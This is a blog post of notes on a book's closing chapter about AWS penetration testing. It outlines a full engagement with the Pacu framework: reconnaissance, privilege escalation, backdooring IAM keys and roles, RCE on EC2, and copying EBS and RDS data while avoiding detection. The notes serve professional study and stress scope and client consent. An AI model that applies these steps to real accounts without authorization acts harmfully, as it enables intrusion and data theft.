Posted in AWSPTwK, Blog

Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 19 – Putting it All Together – Real-World AWS Pentesting

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 19 – Putting it All Together – Real-World AWS Pentesting

Last chapter – HOORAY! Basically a walkthrough of what the pentest would look like with tips for doing a good pentest. The walkthrough uses a PersonalUser in an attacker-controlled account with iam:UpdateAssumeRolePolicy and s3:LIstBucket permissions and a CompromisedUser that is a compromised user with unspecified permissions.

I’m not going to go in-depth on the how in this blog since previous chapters have covered the exploitation vectors. I’ll be focusing on the process and interesting tidbits provided by the authors. If you’ve gone through the book, all of what’s covered should at least ring a bell.

Make sure to go through a kickoff with the client to cover scope, access, etc. Typical pentest stuff. The scoping part is especially important since AWS won’t scope the way a typical environment would. The authors provide a list of questions to help including asking about number of AWS accounts involved, access given, services used, regions, number of instances and other things in use, IAM info, how users access things, etc. Basically get an idea of size and composition of the environment you are dealing with.

AWS pentesting rules and guidelines

Really glad to see this section – pentesting cloud services tends to make me nervous because permission isn’t as clear. Make sure you aren’t breaking the AWS rules for pentesting and the AUP. Realistically, if you are going to be pentesting AWS, you should read through both of these and watch for updates. The authors did point out that the things AWS prohibits does not refer to things being referred to as pentesting in the book since most of the is using the AWS API to do stuff, which is allowed by the AUP. Potentially some gray area there, but I would expect that a pentesting company would have had legal verify that (meaning that Rhino Security Labs has probably had legal look into it). I’d do my own legal verification though (meaning I would want my company to also verify). Call me paranoid, but I’m not a fan of jail.

Credentials and client expectations

I think we can agree that determining what the client expects is important. And probably making sure that everyone is on the same page so you don’t end up repeating the Coalfire incident that led to arrests and was generally a cluster (through no fault of Coalfire from what I can tell). If the client provides creds, understand what the creds are and if social engineering is allowed. Make sure to find out if you are testing a dev or production environment, anything you shouldn’t touch, and if users are active in the environment. Also find out if there will be a blue team trying to catch you. It’s helpful to provide audit and config checks with the attack narrative, but also keep in mind what the client wants.

Setup

Make sure you have AWS CLI and Pacu ready to go. I’d probably create an AMI so I could have a fresh instance for each test. I’d also have ScoutSuite and the CyberArk tools prepped. Get your AWS keys added, fire up Pacu, and start a new session. If given a set of regions, use set_regions to limit your scope.

Unauthenticated reconnaissance

Other than digging around for open S3 buckets, there’s not a lot you can do completely unauthenticated. So this portion is actually talking about using the PersonalUser to do recon. The first command will come from the CompromisedUser though to get the account ID. Basically, use iam__detect_honeytokens to get the account ID, use swap_keys to switch to the PersonalUser, and use iam__enum_users to look for user info. Use a role from the personal account for the --role-name argument since you need it for one of the API calls. Then use iam__enum_roles to get role info. And review the results to see what you’ve found. The authors walk through the findings in their sample environment and explain what the info could mean.

The last part of the authenticated recon using s3__bucket_finder to look for S3 buckets. Remember to add custom terms to the list used if you have any. The authors note that this module uses the install_dependencies function to pull sub-domain info from Sublist3r and the Buckets.txt file. Interesting aside.

Authenticated reconnaissance plus permissions enumeration

Use swap_keys to pull up the CompromisedUser. Run iam__enum_permissions and then whoami to see what privileges you have. Check out any attached policies. Note that if an ARN is listed, that means it’s an AWS-managed policy. Also look at the list of permissions. While enumerating permissions is important, be aware that it might set off a GuardDuty alert. You can get basic info about permissions for other users and roles with iam__enum_users_roles_policies_groups, but it would be better to use the iam__enum_permissions to get more info.

 run iam__enum_permisisons --all-users --all-roles

This will store the info for manual review or checked for exploitation options with the privilege escalation module. You might also want to run aws__enum_account and aws__enum_spend to get more info. (I might also be using the aws__enum_spend option to keep an eye on costs without logging in to the console because why not?) The spend info can help you determine what services to target, but it won’t account for anything on the free tier, isn’t live, and some resources do not have an associated cost.

Since EC2 has a high exploitation potential, running ec2__enum next would be a good idea. Scan all the regions or use set_regions to be more targeted. Check the user data returned for each instance with ec2__download_userdata. One of the really nice features of Pacu is it will ask you if you want to run the module(s) necessary to do what you want to do if you haven’t already. The user data may include command history, passwords, etc. Definitely a worthwhile thing to check. You might find additional targets to attack, but remember if there is any question about the target being in scope, check with the client.

Privilege escalation

Now that you’ve enumerated things, you can pass the info to iam__privesc_scan to see if any privilege escalation potential exists. The --offline flag indicates all the things will be checked. Review the output to see what you can find. Take note of interesting findings, and be sure to report anything vulnerable to the client. You can try the potential vulnerabilities with run iam__privesc_scan. The authors walkthrough some exploitation options with info about what they would choose and why. Really good info, so be sure to check that out.

Persistence

So with an EC2 spun up, you have some good access, but it’s also something that might stick out and get shut down. Or the associated security groups, etc. could get modified removing your access. So persistence needs to be established in other ways. Like most pentesting things, the authors recommend multiple persistence methods. Creating new access key pairs was one options (the iam__backdoor_users_keys option we used earlier). Another option was using the lambda__backdoor_new_roles module to backdoor IAM roles as they are created to allow you to assume the role with your PersonalUser account.

Post-exploitation

Now it’s time to poke around and see what other issues you can find in the environment. You’ll want to examine as many services as possible because misconfigurations can occur anywhere.

EC2 exploitation

EC2 is a good place to start. Check public IP addresses. You can use CreateLoginProfile to create login creds or the data EC2 command in Pacu to get details. Check security groups to get ideas of what services are running and potential exploitation options. You might be able to do the same to non-public EC2 instances with the right conditions – if you’ve been able to get all the admin access, probably will be able to. With the right access, you could also just modify security group rules to give yourself access with the AuthorizeSecurityGroupIngress AWS command or the ec2__backdoor_ec2_sec_groups Pacu module. There are a couple options for RCE. The first given was ec2__startup_shell_script – this requires a restart. Nope. Just nope. Maybe if you are desperate and have the go-ahead from the client to knock a server offline for a bit, but generally, nope. systemmanager__rce_ec2 is another option. It basically gives you root access if the right connections are met. You could also do some cryptomining if you want to really want to push the limits. On one hand, I highly doubt this would be an option in the vast majority of pentesting engagements. On the other, I can see a client wanting to test detection capabilities since cryptomining is such a popular thing. Like everything else, have very clear communication with the client and document to what extent you are allowed to disrupt the environment or incur costs. Does this make your pentest a little less realistic? Yes. But breaking things, driving up costs, and otherwise running amuck in obvious ways generally are not a great way to get repeat clients. At least not in a production environment. You might also want to check out EBS volumes. You can snapshot EBS volumes and share with your account or an EC2 in the compromised account. Sharing with your account has some advantages (like being able to dig in to examine it), but it’s also more likely to be flagged. Or just use ebs__explore_snapshots in Pacu to check things out. It will iterate through them giving you time to explore the EBS volumes before moving on.

Code review and analysis in Lambda

On to Lambda. Start with enumeration using the lambda__enum Pacu module and review using data Lambda. Check each function and look closely at the environment variables for sensitive data – be sure to record/screenshot interesting findings to report. If you find something that might be exploitable, go for it if in scope. You may also want to download the code for review and exploit any interesting findings (again, if in scope).

Getting past authentication in RDS

RDS can be attacked manually or using Pacu. Getting ahold of the databases to check the data is the goal. You could use a tool like mysqldump to pull the data. Be sure to review the options available for whatever type of database you are dealing with. Using this method keeps you from losing access. If you do this manually, you would need to delete any snapshots you made to avoid running up costs and potentially getting caught (or having a negative impact on the client). Pacu automates this with the rds__explore_snapshots that will scan the regions for RDS instances, ask if you want to copy it, and then clean up when done. Really handy. And this module uses the ModifyDbInstance API call that does a bunch of stuff at once, so the master password being changed won’t pop out.

The authenticated side of S3

Lots of info available on finding public S3 buckets. For a pentest when you have creds, you can look at things a little differently. Note who has access to what and what information is in those buckets. Review files found strategically to make best use of your time. Consider filenames and extensions as hints to value. Check for creds, API keys, etc. The authors recommend alerting the client to any public resources since those can go from not a problem to problematic with a single file put in the wrong place. The authors also note that the bucket doesn’t have to be publicly listable even if the files need to be public. Check for any automation and use bucket and filenames to assist with recon.

Auditing for compliance and best practices

Providing audit info in addition to the pentest info is helpful. Stuff like public access, encryption, logging, backups, MFA, password policies, etc. The authors recommend using tools to help with this info. They mention Prowler and Security Monkey in addition to ScoutSuite. Prowler is an AWS CIS benchmark tool that looks interesting. Something to test out at least and see how you like the output. Security Monkey monitors AWS and GCP accounts, but it is unfortunately EOL in 2020. Security Monkey refers you to AWS Config and GCP Cloud Asset Inventory as alternatives. New tools are coming out all the time, so if this is something you need to use, keep an eye on things.

Summary

AWS pentesting is a major undertaking. It’s (like many things in cybersecurity) going to be a never-ending learning process. The authors note it’s hard to be done with an AWS pentest because the environment can be massive and complicated, so do what you can within the timeline. I think this also makes it critical to clearly define scope and be realistic about what you can do within the confines defined. Like most things, people will set up their AWS environment differently so you’ll have to get the lay of the land for each engagement.

So end of the road for this book. Really good book with some pain points that I’ll cover in the book review post.

Author:

Lifelong paradox - cyber sec enthusiast - loves to learn

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.